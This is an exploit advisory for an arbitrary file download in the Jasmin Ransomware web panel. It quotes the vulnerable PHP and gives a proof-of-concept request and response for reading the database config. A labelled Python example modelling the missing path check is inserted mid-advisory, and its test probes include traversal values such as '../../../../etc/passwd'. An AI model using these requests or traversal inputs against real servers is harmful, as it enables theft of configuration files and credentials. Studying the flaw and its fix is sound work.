## https://sploitus.com/exploit?id=PACKETSTORM:189979
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
    # Google Dork: N/A
    # Date: 22-03-2025
    # Exploit Author: bRpsd cy[at]live.no
    # Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
    # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
    # Version: N/A
    # Tested on: macOS, local XAMPP
    
    
    The login check can be bypassed via the SQL injection described in:
    https://www.exploit-db.com/exploits/52091
    
    Note also that the session check in download_file.php only sends a Location
    header and never calls exit, so the rest of the script still executes for a
    request without a valid session.
    
    
    
    Vulnerable file: Web Panel/download_file.php
    Vulnerable parameter: file
    Vulnerable code:
    <?php
    session_start();
    if(!isset($_SESSION['username']) ){
        header("Location: login.php");
    }
    $file=$_GET['file'];
    if(!empty($file)){
        // Define headers
        header("Cache-Control: public");
        header("Content-Description: File Transfer");
        header("Content-Disposition: attachment; filename=$file");
        header("Content-Type: text/encoded");
        header("Content-Transfer-Encoding: binary");
    
        // Read the file (user-controlled path, no containment check)
        readfile($file);
        exit;
    }else{
        echo 'The file does not exist.';
    }
    ?>
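The root cause above is that the value of the file parameter is handed to readfile() unchanged, so any path the web server process can read is served. The following is an added example, not part of the advisory or of the Jasmin code, showing in Python the containment check the script lacks: files are served only from a dedicated download directory, the requested name is resolved with realpath before it is compared against that directory, and the Content-Disposition filename is built from the basename rather than reflecting the raw parameter. The directory layout, file names and probe values are constructed for the demonstration.

```python
"""
Added example (not from the Jasmin advisory or project): the path-containment
check that download_file.php omits, modelled in Python so it runs offline.
"""
import os
import tempfile
from typing import Dict, Optional


def resolve_download(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be refused.

    Only regular files located inside base_dir are accepted. realpath() is
    applied to both sides so that "../" segments, absolute paths and symlinks
    are resolved before the containment comparison.
    """
    if not requested or "\x00" in requested:
        return None
    # Treat an absolute request as relative to the download directory.
    relative = requested.lstrip("/\\")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, relative))
    try:
        # commonpath equals base only when candidate is base or lies below it.
        if os.path.commonpath([base, candidate]) != base or candidate == base:
            return None
    except ValueError:
        # Paths on different drives (Windows) share no common path.
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def attachment_headers(path: str) -> Dict[str, str]:
    """Headers for a file download; the filename is the basename only, so the
    raw request value is never echoed into Content-Disposition."""
    name = os.path.basename(path).replace('"', "")
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % name,
    }


def demo() -> Dict[str, bool]:
    """Build a constructed web root in a temp dir and run the check against
    benign and hostile values of the file parameter.
    Returns {requested_value: accepted}."""
    root = tempfile.mkdtemp()
    downloads = os.path.join(root, "Web Panel", "downloads")
    database = os.path.join(root, "Web Panel", "database")
    os.makedirs(downloads)
    os.makedirs(database)
    with open(os.path.join(downloads, "report.txt"), "w") as fh:
        fh.write("constructed report\n")
    with open(os.path.join(database, "db_conection.php"), "w") as fh:
        fh.write("<?php // constructed stand-in for the real config\n")
    # A symlink inside the download directory pointing outside it.
    try:
        os.symlink(database, os.path.join(downloads, "cfg"))
    except OSError:
        pass  # symlinks unavailable; the probe then simply does not exist
    probes = [
        "report.txt",                      # legitimate download
        "database/db_conection.php",       # the advisory's PoC value
        "../database/db_conection.php",    # parent traversal
        "/etc/passwd",                     # absolute path
        "../../../../etc/passwd",          # deep traversal
        "cfg/db_conection.php",            # escape via symlink
        "report.txt\x00.jpg",              # NUL-byte truncation attempt
    ]
    return {p: resolve_download(downloads, p) is not None for p in probes}


if __name__ == "__main__":
    for value, accepted in demo().items():
        print("%-32r %s" % (value, "served" if accepted else "refused"))
```

With a dedicated download directory the advisory's own value, database/db_conection.php, is refused simply because no such file exists under it; the traversal, absolute, symlink and NUL probes are refused by the realpath containment check before the filesystem is consulted for the file itself.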
    
    
    Proof of concept (request):
    
    http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br, zstd
    Connection: keep-alive
    Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    
    Response:
    
    HTTP/1.1 200 OK
    Date: Sat, 22 Mar 2025 09:42:09 GMT
    Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
    X-Powered-By: PHP/7.4.29
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: public
    Pragma: no-cache
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=database/db_conection.php
    Content-Transfer-Encoding: binary
    Content-Length: 95
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/encoded;charset=UTF-8